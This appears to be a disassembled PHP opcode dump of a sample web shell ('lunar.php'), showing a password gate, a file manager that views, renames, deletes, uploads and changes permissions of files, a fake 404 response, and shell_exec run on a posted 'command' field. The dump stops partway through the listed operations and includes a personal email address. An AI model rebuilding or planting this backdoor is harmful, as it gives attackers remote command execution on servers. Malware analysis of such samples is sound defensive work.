|filename:|/root/samples/lunar.php
|functionname:|(null)
|numberofops:|1436
|compiledvars:|!0=$ZQ262,|!1=$p0Gqj,|!2=$OwP2G,|!3=$QzoO2,|!4=$ll7yH,|!5=$SS1jC,|!6=$fOcvN,|!7=$S_jUd,|!8=$ZPln3,|!9=$xgR7M,|!10=$CtFAI,|!11=$xTatk,|!12=$TZuaD,|!13=$f7wDd,|!14=$F6n37,|!15=$JvreB,|!16=$ArDuP,|!17=$kJDvx,|!18=$fChcw,|!19=$kFdyP,|!20=$xB17R,|!21=$Bhi4X,|!22=$VivOn,|!23=$hM2bs,|!24=$fbp0B,|!25=$J_YL2,|!26=$LDaGc,|!27=$N2fAf,|!28=$btTOL,|!29=$wWuOu,|!30=$SAkWY,|!31=$ZrklJ,|!32=$E6iUi,|!33=$ZTDXr,|!34=$J8xlh,|!35=$fTWYK,|!36=$BvdOX,|!37=$IV14b
|line|#*|||op|fetch|ext|return|operands
|2|0|E>>|JMP||||->9|
||1|>>|JMP||||->651|
||2|*|JMP||||->1224|
||3|>>|JMP||||->437|
||4|*|JMP||||->379|
||5|>|IS_EQUAL||||!0|,|'delete'|
||6|>|JMPZ||||~38|,|->8|
||7|>>|JMP||||->704|
||8|>>|JMP||||->72|
||9|>|INIT_FCALL||||'session_start'|
||10||DO_ICALL||||
||11|>|JMP||||->1103|
||12|>>|JMP||||->706|
||13|>|INIT_FCALL||||'basename'|
||14||FETCH_R|global||~40|'_POST'|
||15||FETCH_DIM_R|||~41|~40|,|'new_file_name'|
||16||SEND_VAL||||~41|
||17||DO_ICALL|||$42|
||18||ASSIGN||||!1|,|$42|
||19|>|JMP||||->110|
||20|>|ECHO||||'++++++++%3Cinput+type%3D%22text%22+name%3D%22new_permissions%22+id%3D%22new_permissions%22+class%3D%22border+p-1%22+value%3D%22'|
||21|>|JMP||||->1271|
||22|>>|JMP||||->83|
||23|>>|JMP||||->68|
||24|>|ASSIGN||||!2|,|<array>|
||25|>|JMP||||->124|
||26|>|INIT_FCALL_BY_NAME||||'fo73G'|
||27||SEND_VAL_EX||||'Berhasil+mengubah+nama+file'|
||28||DO_FCALL||0||
||29|>|JMP||||->1340|
||30|>>|JMP||||->1138|
||31|>|ASSIGN||||!3|,|'INI+SHELL'|
||32|>|JMP||||->1077|
||33|>>|JMP||||->1070|
||34|*|JMP||||->92|
||35|>|INIT_FCALL_BY_NAME||||'Scsoc'|
||36||CHECK_FUNC_ARG||||
||37||FETCH_FUNC_ARG|global||$47|'_GET'|
||38||FETCH_DIM_FUNC_ARG|||$48|$47|,|'n'|
||39||SEND_FUNC_ARG||||$48|
||40||DO_FCALL||0|$49|
||41||ASSIGN||||!4|,|$49|
||42|>|JMP||||->1341|
||43|>>|JMP||||->178|
||44|>>|JMP||||->690|
||45|>>|EXIT||||
||46|*|JMP||||->407|
||47|>|FETCH_IS|||~51|'_GET'|
||48||ISSET_ISEMPTY_DIM_OBJ||0|~52|~51|,|'p'|
||49||BOOL_NOT|||~53|~52|
||50|>|JMPZ||||~53|,|->52|
||51|>>|JMP||||->791|
||52|>>|JMP||||->1365|
||53|>>|JMP||||->651|
||54|*|JMP||||->1331|
||55|>|ECHO||||'%3C%2Ffont%3E%0A%3C%2Fh5%3E%0A%3Cdiv+class%3D%22form-group%22%3E%0A%3Ctextarea+name%3D%22file_content%22+id%3D%22file_content%22+cols%3D%2230%22+rows%3D%2210%22+class%3D%22form-control+rainbow-border%22+readonly%3E'|
||56|>|JMP||||->850|
||57|>>|JMP||||->1413|
||58|*|JMP||||->704|
||59|>>|JMP||||->1406|
||60|>>|JMP||||->805|
||61|>>|JMP||||->1136|
||62|>|INIT_FCALL||||'getcwd'|
||63||DO_ICALL|||$54|
||64||ASSIGN||||!5|,|$54|
||65|>|JMP||||->1160|
||66|>|ECHO||||'%3Ch5+class%3D%22p-1+rainbow-border%22+style%3D%22text-align%3A+center%3B%22%3E%0A++++View+File+Name+%3A+%3Cfont+color%3D%22white%22%3E'|
||67|>|JMP||||->677|
||68|>>|JMP||||->1|
||69|>>|JMP||||->1223|
||70|*|JMP||||->44|
||71|>>|JMP||||->1396|
||72|>>|JMP||||->57|
||73|>|FETCH_R|global||~56|'_POST'|
||74||FETCH_DIM_R|||~57|~56|,|'new_permissions'|
||75||ASSIGN||||!6|,|~57|
||76|>|JMP||||->62|
||77|>>|JMP||||->613|
||78|>|INIT_FCALL||||'phpversion'|
||79||DO_ICALL|||$59|
||80||ECHO||||$59|
||81|>|JMP||||->638|
||82|>>|JMP||||->30|
||83|>|ECHO||||'%3C%2Fdiv%3E%0A%3Cdiv+class%3D%22table-responsive+text-light+rainbow-border%22+style%3D%22text-align%3A+left%3Bpadding%3A+4px%3Bmargin-bottom%3A+3px%3Bmargin-top%3A+3px%3B%22%3E%0A%3Cli%3EDir+%3A+%3Cspan%3E'|
||84|>|JMP||||->670|
||85|>|INIT_FCALL||||'ignore_user_abort'|
||86||SEND_VAL||||<true>|
||87||DO_ICALL||||
||88|>|JMP||||->778|
||89|>>|JMP||||->385|
||90|>>|JMP||||->436|
||91|*|JMP||||->1070|
||92|>>|JMP||||->202|
||93|>|FETCH_IS|||~61|'_GET'|
||94||ISSET_ISEMPTY_DIM_OBJ||0||~61|,|'a'|
||95|>|JMPZ||||~62|,|->97|
||96|>>|JMP||||->92|
||97|>>|JMP||||->33|
||98|>|NOP||||
||99||FAST_CONCAT|||~63|!5|,|'%2F'|
||100||INIT_FCALL_BY_NAME||||'SCsOc'|
||101||CHECK_FUNC_ARG||||
||102||FETCH_FUNC_ARG|global||$64|'_GET'|
||103||FETCH_DIM_FUNC_ARG|||$65|$64|,|'n'|
||104||SEND_FUNC_ARG||||$65|
||105||DO_FCALL||0|$66|
||106||CONCAT|||~67|~63|,|$66|
||107||ASSIGN||||!7|,|~67|
||108|>|JMP||||->380|
||109|>>|JMP||||->1427|
||110|>|FETCH_R|global||~69|'_POST'|
||111||FETCH_DIM_R|||~70|~69|,|'file_content'|
||112||ASSIGN||||!8|,|~70|
||113|>|JMP||||->609|
||114|>>|JMP||||->1309|
||115|>|INIT_FCALL||||'getenv'|
||116||SEND_VAL||||'REMOTE_ADDR'|
||117||DO_ICALL|||$72|
||118||ASSIGN||||!9|,|$72|
||119|>|JMP||||->31|
||120|>|INIT_FCALL||||'getcwd'|
||121||DO_ICALL|||$74|
||122||ASSIGN||||!5|,|$74|
||123|>|JMP||||->151|
||124|>|ASSIGN||||!10|,|0|
||125|>|JMP||||->661|
||126|>|INIT_FCALL||||'http_response_code'|
||127||SEND_VAL||||404|
||128||DO_ICALL||||
||129|>|JMP||||->1117|
||130|>|FETCH_R|global||~78|'_POST'|
||131||FETCH_DIM_R|||~79|~78|,|'command'|
||132||ASSIGN||||!11|,|~79|
||133|>|JMP||||->1225|
||134|>>|JMP||||->1224|
||135|*|JMP||||->43|
||136|>>|JMP||||->652|
||137|>|INIT_FCALL||||'file_exists'|
||138||SEND_VAR||||!12|
||139||DO_ICALL|||$81|
||140||BOOL_NOT|||~82|$81|
||141|>|JMPZ||||~82|,|->143|
||142|>>|JMP||||->1149|
||143|>>|JMP||||->834|
||144|>|INIT_FCALL||||'rename'|
||145||SEND_VAR||||!7|
||146||SEND_VAR||||!13|
||147||DO_ICALL|||$83|
||148|>|JMPZ||||$83|,|->150|
||149|>>|JMP||||->1151|
||150|>>|JMP||||->416|
||151|>|ROPE_INIT||3|~85|!5|
||152||ROPE_ADD||1|~85|~85|,|'%2F'|
||153||ROPE_END||2|~84|~85|,|!15|
||154||ASSIGN||||!14|,|~84|
||155|>|JMP||||->183|
||156|>|INIT_FCALL_BY_NAME||||'scSOC'|
||157||CHECK_FUNC_ARG||||
||158||FETCH_DIM_FUNC_ARG|||$89|!2|,|!10|
||159||SEND_FUNC_ARG||||$89|
||160||DO_FCALL||0|$90|
||161||ASSIGN_DIM||||!2|,|!10|
||162||OP_DATA||||$90|
||163|>|JMP||||->449|
||164|>|INIT_FCALL||||'htmlspecialchars'|
||165||SEND_VAR||||!16|
||166||DO_ICALL|||$91|
||167||ECHO||||$91|
||168|>|JMP||||->801|
||169|>|ECHO||||'%3Ctable+class%3D%22table+table-hover+table-borderless+table-sm%22+style%3D%22text-align%3A+center%3Bwidth%3A+100%25%3B%22%3E%0A%3Cthead+class%3D%22text-light%22%3E%0A%3Ctr%3E%0A%3Cth+style%3D%22width%3A+45%25%3B%22%3EName%3C%2Fth%3E%0A%3Cth+style%3D%22width%3A+13%25%3B%22%3ESize%3C%2Fth%3E%0A%3Cth+style%3D%22width%3A+13%25%3B%22%3EPermission%3C%2Fth%3E%0A%3Cth+colspan%3D%223%22%3EAction%3C%2Fth%3E%0A%3C%2Ftr%3E%0A%3C%2Fthead%3E%0A%3Ctbody+class%3D%22text-light%22%3E+'|
||170|>|JMP||||->583|
||171|>>|JMP||||->687|
||172|>|INIT_FCALL_BY_NAME||||'jq1Ug'|
||173||SEND_VAR_EX||||!12|
||174||DO_FCALL||0||
||175|>|JMP||||->813|
||176|>|ECHO||||'%3C%2Fspan%3E%3C%2Fli%3E%0A%3Cli%3EServer+IP+%3A+%3Cspan+style%3D%22color%3A+white%3B%22%3E'|
||177|>|JMP||||->1247|
||178|>|IS_EQUAL|||~93|!0|,|'view'|
||179||BOOL_NOT|||~94|~93|
||180|>|JMPZ||||~94|,|->182|
||181|>>|JMP||||->1319|
||182|>>|JMP||||->626|
||183|>|INIT_FCALL||||'file_exists'|
||184||SEND_VAR||||!14|
||185||DO_ICALL|||$95|
||186|>|JMPZ||||$95|,|->188|
||187|>>|JMP||||->114|
||188|>>|JMP||||->1170|
||189|>|FETCH_DIM_R|||~96|!2|,|2|
||190||INIT_DYNAMIC_CALL||||~96|
||191||DO_FCALL||0|$97|
||192||ASSIGN||||!17|,|$97|
||193|>|JMP||||->1204|
||194|>>|JMP||||->1331|
||195|*|JMP||||->831|
||196|>>|JMP||||->61|
||197|*|JMP||||->391|
||198|>>|JMP||||->415|
||199|*|JMP||||->1190|
||200|>>|JMP||||->1293|
||201|>>|JMP||||->431|
||202|>|FETCH_IS|||~99|'_GET'|
||203||ISSET_ISEMPTY_DIM_OBJ||0||~99|,|'a'|
||204|>|JMPZ||||~100|,|->206|
||205|>>|JMP||||->635|
||206|>>|JMP||||->599|
||207|>|ECHO||||'%3C%2Fh5%3E%0A%3Cform+method%3D%22post%22%3E%0A++++%3Cdiv+class%3D%22form-group%22%3E%0A'|
||208|>|JMP||||->35|
||209|>|ECHO||||'%3C%2Fh5%3E%0A%3Cform+method%3D%22post%22%3E%0A++++%3Cdiv+class%3D%22form-group%22%3E%0A++++++++%3Cinput+type%3D%22text%22+name%3D%22new_file_name%22+id%3D%22new_file_name%22+class%3D%22border+p-1%22+value%3D%22'|
||210|>|JMP||||->1129|
||211|>>|JMP||||->1426|
||212|>|ECHO||||'%3Ch5+class%3D%22p-1+rainbow-border%22%3ERename+File+%3A+'|
||213|>|JMP||||->1373|
||214|>>|FE_RESET_R|||$101|!18|,|->354|
||215|>>|FE_FETCH_R||||$101|,|!19|,->354|
||216|>|NOP||||
||217|>|JMP||||->328|
||218|>|NOP||||
||219|>|JMP||||->347|
||220|*|NOP||||
||221|*|JMP||||->343|
||222|>|INIT_FCALL_BY_NAME||||'Ce_vX'|
||223||ROPE_INIT||3|~103|!17|
||224||ROPE_ADD||1|~103|~103|,|'%2F'|
||225||ROPE_END||2|~102|~103|,|!19|
||226||SEND_VAL_EX||||~102|
||227||DO_FCALL||0|$105|
||228||CONCAT|||~106|'+%0A%3Ctr%3E%0A%3Ctd+style%3D%22text-align%3A+left%3B%22%3E%0A%3Ci+class%3D%22fa+fa-fw+fa-folder-o%22+style%3D%22border%3A+0%3Bpadding%3A+0%3Bwidth%3A+1.28571429em%3B%22%3E%3C%2Fi%3E%3Ca+href%3D%22%3Fp%3D'|,|$105|
||229||CONCAT|||~107|~106|,|'%22+data-toggle%3D%22tooltip%22+data-placement%3D%22auto%22+title%3D%22Latest+modify+on+'|
||230||FETCH_DIM_R|||~108|!2|,|19|
||231||INIT_DYNAMIC_CALL||||~108|
||232||SEND_VAL_EX||||'Y-m-d+H%3Ai'|
||233||FETCH_DIM_R|||~109|!2|,|20|
||234||INIT_DYNAMIC_CALL||||~109|
||235||ROPE_INIT||3|~111|!17|
||236||ROPE_ADD||1|~111|~111|,|'%2F'|
||237||ROPE_END||2|~110|~111|,|!19|
||238||SEND_VAL_EX||||~110|
||239||DO_FCALL||0|$113|
||240||SEND_VAR_NO_REF_EX||||$113|
||241||DO_FCALL||0|$114|
||242||CONCAT|||~115|~107|,|$114|
||243||ROPE_INIT||3|~117|'%22%3E'|
||244||ROPE_ADD||1|~117|~117|,|!19|
||245||ROPE_END||2|~116|~117|,|'%3C%2Fa%3E%3C%2Ftd%3E%0A%3Ctd+style%3D%22color%3A+black%3B%22%3E%3Cspan%3E%3C%2Fspan%3E%3C%2Ftd%3E%0A%3Ctd%3E%0A++++++++++++++++++++%3Ca+href%3D%22%3Fp%3D'|
||246||CONCAT|||~119|~115|,|~116|
||247||INIT_FCALL_BY_NAME||||'cE_vX'|
||248||SEND_VAR_EX||||!17|
||249||DO_FCALL||0|$120|
||250||CONCAT|||~121|~119|,|$120|
||251||CONCAT|||~122|~121|,|'%26a%3D'|
||252||INIT_FCALL_BY_NAME||||'cE_VX'|
||253||SEND_VAL_EX||||'changePerms'|
||254||DO_FCALL||0|$123|
||255||CONCAT|||~124|~122|,|$123|
||256||CONCAT|||~125|~124|,|'%26n%3D'|
||257||INIT_FCALL_BY_NAME||||'cE_vX'|
||258||SEND_VAR_EX||||!19|
||259||DO_FCALL||0|$126|
||260||CONCAT|||~127|~125|,|$126|
||261||CONCAT|||~128|~127|,|'%22+data-toggle%3D%22tooltip%22+data-placement%3D%22auto%22+title%3D%22Change+Permissions%22+data-original-title%3D%22Change+Permissions%22%3E%3Cfont+color%3D%22'|
||262||FETCH_DIM_R|||~129|!2|,|8|
||263||INIT_DYNAMIC_CALL||||~129|
||264||ROPE_INIT||3|~131|!17|
||265||ROPE_ADD||1|~131|~131|,|'%2F'|
||266||ROPE_END||2|~130|~131|,|!19|
||267||SEND_VAL_EX||||~130|
||268||DO_FCALL||0|$133|
||269|>|JMPZ||||$133|,|->272|
||270|>|QM_ASSIGN|||~134|'%2300ff00'|
||271|>|JMP||||->285|
||272|>|FETCH_DIM_R|||~135|!2|,|9|
||273||INIT_DYNAMIC_CALL||||~135|
||274||ROPE_INIT||3|~137|!17|
||275||ROPE_ADD||1|~137|~137|,|'%2F'|
||276||ROPE_END||2|~136|~137|,|!19|
||277||SEND_VAL_EX||||~136|
||278||DO_FCALL||0|$139|
||279||BOOL_NOT|||~140|$139|
||280|>|JMPZ||||~140|,|->283|
||281|>|QM_ASSIGN|||~141|'%23a200ff'|
||282|>|JMP||||->284|
||283|>|QM_ASSIGN|||~141|null|
||284|>|QM_ASSIGN|||~134|~141|
||285|>|CONCAT|||~142|~128|,|~134|
||286||CONCAT|||~143|~142|,|'%22%3E'|
||287||INIT_FCALL_BY_NAME||||'knstU'|
||288||ROPE_INIT||3|~145|!17|
||289||ROPE_ADD||1|~145|~145|,|'%2F'|
||290||ROPE_END||2|~144|~145|,|!19|
||291||SEND_VAL_EX||||~144|
||292||DO_FCALL||0|$147|
||293||CONCAT|||~148|~143|,|$147|
||294||CONCAT|||~149|~148|,|'%3C%2Ffont%3E%3C%2Fa%3E%0A++++++++++++++++%3C%2Ftd%3E%0A%3Ctd+style%3D%22color%3A+black%3Bwidth%3A+9.5%25%3B%22%3E%3Cspan%3E%3C%2Fspan%3E%3C%2Ftd%3E%0A%3Ctd%3E%0A%3Ca+href%3D%22%3Fp%3D'|
||295||INIT_FCALL_BY_NAME||||'cE_Vx'|
||296||SEND_VAR_EX||||!17|
||297||DO_FCALL||0|$150|
||298||CONCAT|||~151|~149|,|$150|
||299||CONCAT|||~152|~151|,|'%26a%3D'|
||300||INIT_FCALL_BY_NAME||||'Ce_Vx'|
||301||SEND_VAL_EX||||'rename'|
||302||DO_FCALL||0|$153|
||303||CONCAT|||~154|~152|,|$153|
||304||CONCAT|||~155|~154|,|'%26n%3D'|
||305||INIT_FCALL_BY_NAME||||'CE_VX'|
||306||SEND_VAR_EX||||!19|
||307||DO_FCALL||0|$156|
||308||CONCAT|||~157|~155|,|$156|
||309||CONCAT|||~158|~157|,|'%26t%3Dd%22+data-toggle%3D%22tooltip%22+data-placement%3D%22auto%22+title%3D%22Rename%22%3ERename%3C%2Fa%3E%0A%3C%2Ftd%3E%0A%3Ctd%3E%0A%3Ca+href%3D%22%3Fp%3D'|
||310||INIT_FCALL_BY_NAME||||'Ce_VX'|
||311||SEND_VAR_EX||||!17|
||312||DO_FCALL||0|$159|
||313||CONCAT|||~160|~158|,|$159|
||314||CONCAT|||~161|~160|,|'%26a%3D'|
||315||INIT_FCALL_BY_NAME||||'ce_vx'|
||316||SEND_VAL_EX||||'delete'|
||317||DO_FCALL||0|$162|
||318||CONCAT|||~163|~161|,|$162|
||319||CONCAT|||~164|~163|,|'%26n%3D'|
||320||INIT_FCALL_BY_NAME||||'Ce_vx'|
||321||SEND_VAR_EX||||!19|
||322||DO_FCALL||0|$165|
||323||CONCAT|||~166|~164|,|$165|
||324||CONCAT|||~167|~166|,|'%22+class%3D%22delete%22+data-type%3D%22folder%22+data-toggle%3D%22tooltip%22+data-placement%3D%22auto%22+title%3D%22Delete%22%3EDelete%3C%2Fa%3E%0A%3C%2Ftd%3E%0A%3C%2Ftr%3E'|
||325||ECHO||||~167|
||326||NOP||||
||327|>|JMP||||->345|
||328|>|FETCH_DIM_R|||~168|!2|,|6|
||329||INIT_DYNAMIC_CALL||||~168|
||330||ROPE_INIT||3|~170|!17|
||331||ROPE_ADD||1|~170|~170|,|'%2F'|
||332||ROPE_END||2|~169|~170|,|!19|
||333||SEND_VAL_EX||||~169|
||334||DO_FCALL||0|$172|
||335||BOOL_NOT|||~173|$172|
||336|>|JMPZ||||~173|,|->339|
||337|>|NOP||||
||338|>|JMP||||->343|
||339|>|NOP||||
||340|>|JMP||||->218|
||341|>|NOP||||
||342|>|JMP||||->353|
||343|>|NOP||||
||344|>|JMP||||->349|
||345|>|NOP||||
||346|>|JMP||||->341|
||347|>|NOP||||
||348|>|JMP||||->222|
||349|>|NOP||||
||350|>|JMP||||->345|
||351|*|NOP||||
||352|*|JMP||||->347|
||353|>>|JMP||||->215|
||354|>|FE_FREE||||$101|
||355|>|JMP||||->777|
||356|>|ECHO||||'%0A%3Cdiv+class%3D%22form-group%22%3E%0A++++%3Ctextarea+cols%3D%2230%22+rows%3D%225%22+class%3D%22form-control+rainbow-border%22+readonly%3E'|
||357|>|JMP||||->164|
||358|>|FETCH_IS|||~174|'_FILES'|
||359||FETCH_DIM_IS|||~175|~174|,|'f'|
||360||ISSET_ISEMPTY_DIM_OBJ||0|~176|~175|,|'name'|
||361|>|JMPZ_EX|||~176|~176|,|->368|
||362|>|FETCH_R|global||~177|'_FILES'|
||363||FETCH_DIM_R|||~178|~177|,|'f'|
||364||FETCH_DIM_R|||~179|~178|,|'name'|
||365||COUNT|||~180|~179|
||366||IS_SMALLER|||~181|0|,|~180|
||367||BOOL|||~176|~181|
||368|>>|JMPZ||||~176|,|->370|
||369|>>|JMP||||->12|
||370|>>|JMP||||->1257|
||371|>|INIT_FCALL_BY_NAME||||'fo73G'|
||372||SEND_VAL_EX||||'Folder+berhasil+dibuat'|
||373||DO_FCALL||0||
||374|>|JMP||||->61|
||375|>|FETCH_W|global||$183|'_SESSION'|
||376||ASSIGN_DIM||||$183|,|'authenticated'|
||377||OP_DATA||||<true>|
||378|>|JMP||||->200|
||379|>>|JMP||||->1281|
||380|>|ROPE_INIT||3|~186|!5|
||381||ROPE_ADD||1|~186|~186|,|'%2F'|
||382||ROPE_END||2|~185|~186|,|!20|
||383||ASSIGN||||!13|,|~185|
||384|>|JMP||||->144|
||385|>|INIT_FCALL_BY_NAME||||'Fo73g'|
||386||SEND_VAL_EX||||'Berhasil+mengubah+izin'|
||387||DO_FCALL||0||
||388|>|JMP||||->136|
||389|>|ECHO||||'%0A%3C%21DOCTYPE+html%3E%0A++++%3Chtml%3E%0A++++%3Chead%3E%0A++++++++%3Ctitle%3E.%3AKeQueeN%3A.%3C%2Ftitle%3E%0A++++%3C%2Fhead%3E%0A++++%3Cbody%3E%0A++++++%3Cstyle%3E%0A++++++body+%7B%0A++++++margin%3A+0%3B%0A++++++padding%3A+0%3B%0A++++++height%3A+100vh%3B%0A++++++display%3A+flex%3B%0A++++++justify-content%3A+center%3B%0A++++++align-items%3A+center%3B%0A++++++background%3A+url%28%27https%3A%2F%2Fi.ibb.co%2FzJNgVgj%2FDesktop-Wallpaper-For-Keqing.jpg%27%29+no-repeat+center+center+fixed%3B%0A++++++background-size%3A+cover%3B%0A++++++color%3A+white%3B%0A++++++font-family%3A+Arial%2C+sans-serif%3B%0A++++++%7D%0A++++++%0A++++++form+%7B%0A++++++background%3A+transparent%3B%0A++++++padding%3A+20px%3B%0A++++++border-radius%3A+10px%3B%0A++++++%7D%0A++++++%0A++++++label+%7B%0A++++++display%3A+block%3B%0A++++++margin-bottom%3A+10px%3B%0A++++++%7D%0A++++++%0A++++++input+%7B%0A++++++width%3A+100%25%3B%0A++++++padding%3A+10px%3B%0A++++++margin-bottom%3A+15px%3B%0A++++++box-sizing%3A+border-box%3B%0A++++++border%3A+2px+solid+%23000000%3B%0A++++++border-radius%3A+5px%3B%0A++++++background-color%3A+transparent%3B%0A++++++color%3A+black%3B%0A++++++text-align%3A+center%3B%0A++++++%7D%0A++++++%0A++++++input%5Btype%3D%22submit%22%5D+%7B%0A++++++color%3A+white%3B%0A++++++cursor%3A+pointer%3B%0A++++++%7D%0A++++++%0A++++++input%5Btype%3D%22submit%22%5D%3Ahover+%7B%0A++++++background-color%3A+%23000000%3B%0A++++++%7D%0A++++++input%5Btype%3D%22password%22%5D%3Ahover+%7B%0A++++++background-color%3A+%23ffffff%3B%0A++++++%7D%0A++++++%3C%2Fstyle%3E%0A++++++%3C%2Fhead%3E%0A++++++%3Cbody%3E%0A%3Cform+method%3D%27post%27%3E%0A+++++++++%3Ccenter%3E%3Ch1%3ESilahkan+Login+Terlebih+Dahulu%21%3C%2Fh1%3E%3C%2Fcenter%3E%0A++++++++++++%3Cinput+type%3D%27password%27+name%3D%27password%27%3E%0A%3Cinput+type%3D%27submit%27+value%3D%27Login%27%3E%0A++++++++++%3C%2Fform%3E%0A++++++%3C%2Fbody%3E%0A++++++%3C%2Fhtml%3E'|
||390|>|JMP||||->45|
||391|>>|JMP||||->371|
||392|>|INIT_FCALL_BY_NAME||||'FO73g'|
||393||SEND_VAL_EX||||'File+berhasil+dibuat'|
||394||SEND_VAL_EX||||1|
||395||INIT_FCALL_BY_NAME||||'Ce_VX'|
||396||SEND_VAL_EX||||'view'|
||397||DO_FCALL||0|$190|
||398||CONCAT|||~191|'%26a%3D'|,|$190|
||399||CONCAT|||~192|~191|,|'%26n%3D'|
||400||INIT_FCALL_BY_NAME||||'ce_Vx'|
||401||SEND_VAR_EX||||!1|
||402||DO_FCALL||0|$193|
||403||CONCAT|||~194|~192|,|$193|
||404||SEND_VAL_EX||||~194|
||405||DO_FCALL||0||
||406|>|JMP||||->1412|
||407|>>|JMP||||->595|
||408|>>|JMP||||->1407|
||409|>|INIT_FCALL_BY_NAME||||'fo73G'|
||410||SEND_VAL_EX||||'file+deleted+successfully'|
||411||DO_FCALL||0||
||412|>|JMP||||->776|
||413|>>|JMP||||->1340|
||414|*|JMP||||->1151|
||415|>>|JMP||||->212|
||416|>|INIT_FCALL_BY_NAME||||'fO73g'|
||417||SEND_VAL_EX||||'Gagal+mengubah+nama+file'|
||418||SEND_VAL_EX||||0|
||419||DO_FCALL||0||
||420|>|JMP||||->413|
||421|>|FETCH_DIM_R|||~198|!2|,|3|
||422||INIT_DYNAMIC_CALL||||~198|
||423||INIT_FCALL||||'scsoc'|
||424||FETCH_R|global||~199|'_GET'|
||425||FETCH_DIM_R|||~200|~199|,|'p'|
||426||SEND_VAL||||~200|
||427||DO_FCALL||0|$201|
||428||SEND_VAR_NO_REF_EX||||$201|
||429||DO_FCALL||0||
||430|>|JMP||||->59|
||431|>|INIT_FCALL||||'shell_exec'|
||432||SEND_VAR||||!11|
||433||DO_ICALL|||$203|
||434||ASSIGN||||!16|,|$203|
||435|>|JMP||||->1256|
||436|>>|JMP||||->1354|
||437|>>|JMP||||->23|
||438|>|IS_EQUAL|||~205|!0|,|'changePerms'|
||439||BOOL_NOT|||~206|~205|
||440|>|JMPZ||||~206|,|->442|
||441|>>|JMP||||->43|
||442|>>|JMP||||->134|
||443|>|INIT_FCALL||||'getcwd'|
||444||DO_ICALL|||$207|
||445||ASSIGN||||!17|,|$207|
||446|>|JMP||||->5|
||447|>|PRE_INC||||!10|
||448|>|JMP||||->1213|
||449|>>|JMP||||->447|
||450|>|INIT_FCALL||||'htmlspecialchars'|
||451||INIT_FCALL||||'file_get_contents'|
||452||INIT_FCALL||||'getcwd'|
||453||DO_ICALL|||$210|
||454||CONCAT|||~211|$210|,|'%2F'|
||455||INIT_FCALL||||'scsoc'|
||456||FETCH_R|global||~212|'_GET'|
||457||FETCH_DIM_R|||~213|~212|,|'n'|
||458||SEND_VAL||||~213|
||459||DO_FCALL||0|$214|
||460||CONCAT|||~215|~211|,|$214|
||461||SEND_VAL||||~215|
||462||DO_ICALL|||$216|
||463||SEND_VAR||||$216|
||464||DO_ICALL|||$217|
||465||ECHO||||$217|
||466|>|JMP||||->1389|
||467|>>|FE_RESET_R|||$218|!21|,|->581|
||468|>>|FE_FETCH_R|||~219|$218|,|!22|,->581|
||469|>|ASSIGN||||!23|,|~219|
||470||NOP||||
||471|>|JMP||||->547|
||472|>|NOP||||
||473|>|JMP||||->493|
||474|*|NOP||||
||475|*|JMP||||->503|
||476|>|PRE_INC||||!10|
||477||NOP||||
||478|>|JMP||||->556|
||479|>|IS_EQUAL||||!22|,|''|
||480|>|JMPZ||||~222|,|->483|
||481|>|NOP||||
||482|>|JMP||||->572|
||483|>|NOP||||
||484|>|JMP||||->539|
||485|>|NOP||||
||486|>|JMP||||->501|
||487|*|NOP||||
||488|*|JMP||||->497|
||489|>|NOP||||
||490|>|JMP||||->517|
||491|>|NOP||||
||492|>|JMP||||->560|
||493|>|NOP||||
||494|>|JMP||||->533|
||495|>|NOP||||
||496|>|JMP||||->520|
||497|>|NOP||||
||498|>|JMP||||->479|
||499|>|NOP||||
||500|>|JMP||||->476|
||501|>|NOP||||
||502|>|JMP||||->545|
||503|>|NOP||||
||504|>|JMP||||->505|
||505|>|INIT_FCALL_BY_NAME||||'CE_vX'|
||506||CHECK_FUNC_ARG||||
||507||FETCH_DIM_FUNC_ARG|||$223|!21|,|!10|
||508||SEND_FUNC_ARG||||$223|
||509||DO_FCALL||0|$224|
||510||ECHO||||$224|
||511||NOP||||
||512|>|JMP||||->523|
||513|>|NOP||||
||514|>|JMP||||->497|
||515|*|NOP||||
||516|*|JMP||||->489|
||517|>|ECHO||||'%3Ca+href%3D%22%3Fp%3D2f%22+class%3D%22combet%22%3E%7E%3C%2Fa%3E%2F'|
||518||NOP||||
||519|>|JMP||||->485|
||520|>|ECHO||||'2f'|
||521||NOP||||
||522|>|JMP||||->543|
||523|>|IS_NOT_EQUAL||||!10|,|!23|
||524|>|JMPZ||||~225|,|->527|
||525|>|NOP||||
||526|>|JMP||||->495|
||527|>|NOP||||
||528|>|JMP||||->529|
||529|>|NOP||||
||530|>|JMP||||->543|
||531|*|NOP||||
||532|*|JMP||||->495|
||533|>|ROPE_INIT||3|~227|'%22%3E'|
||534||ROPE_ADD||1|~227|~227|,|!22|
||535||ROPE_END||2|~226|~227|,|'%3C%2Fa%3E%2F'|
||536||ECHO||||~226|
||537||NOP||||
||538|>|JMP||||->501|
||539|>|NOP||||
||540|>|JMP||||->491|
||541|*|NOP||||
||542|*|JMP||||->572|
||543|>|NOP||||
||544|>|JMP||||->499|
||545|>|NOP||||
||546|>|JMP||||->580|
||547|>|IS_EQUAL|||~229|!23|,|0|
||548|>|JMPZ_EX|||~229|~229|,|->551|
||549|>|IS_EQUAL|||~230|!22|,|''|
||550||BOOL|||~229|~230|
||551|>>|JMPZ||||~229|,|->554|
||552|>|NOP||||
||553|>|JMP||||->489|
||554|>|NOP||||
||555|>|JMP||||->513|
||556|>|NOP||||
||557|>|JMP||||->578|
||558|*|NOP||||
||559|*|JMP||||->493|
||560|>|ECHO||||'%3Ca+class%3D%22combet%22+href%3D%22%3Fp%3D'|
||561||NOP||||
||562|>|JMP||||->569|
||563|>|IS_SMALLER_OR_EQUAL||||!10|,|!23|
||564|>|JMPZ||||~231|,|->567|
||565|>|NOP||||
||566|>|JMP||||->503|
||567|>|NOP||||
||568|>|JMP||||->472|
||569|>|ASSIGN||||!10|,|0|
||570||NOP||||
||571|>|JMP||||->578|
||572|>|NOP||||
||573|>|JMP||||->574|
||574|>|NOP||||
||575|>|JMP||||->501|
||576|*|NOP||||
||577|*|JMP||||->491|
||578|>|NOP||||
||579|>|JMP||||->563|
||580|>>|JMP||||->468|
||581|>|FE_FREE||||$218|
||582|>|JMP||||->790|
||583|>|FETCH_DIM_R|||~233|!2|,|5|
||584||INIT_DYNAMIC_CALL||||~233|
||585||INIT_DYNAMIC_CALL||||!18|
||586||SEND_VAR_EX||||!17|
||587||DO_FCALL||0|$234|
||588||SEND_VAR_NO_REF_EX||||$234|
||589||SEND_VAL_EX||||<array>|
||590||DO_FCALL||0|$235|
||591||ASSIGN||||!18|,|$235|
||592|>|JMP||||->214|
||593|>|ASSIGN||||!24|,|'alexspedo878%40gmail.com'|
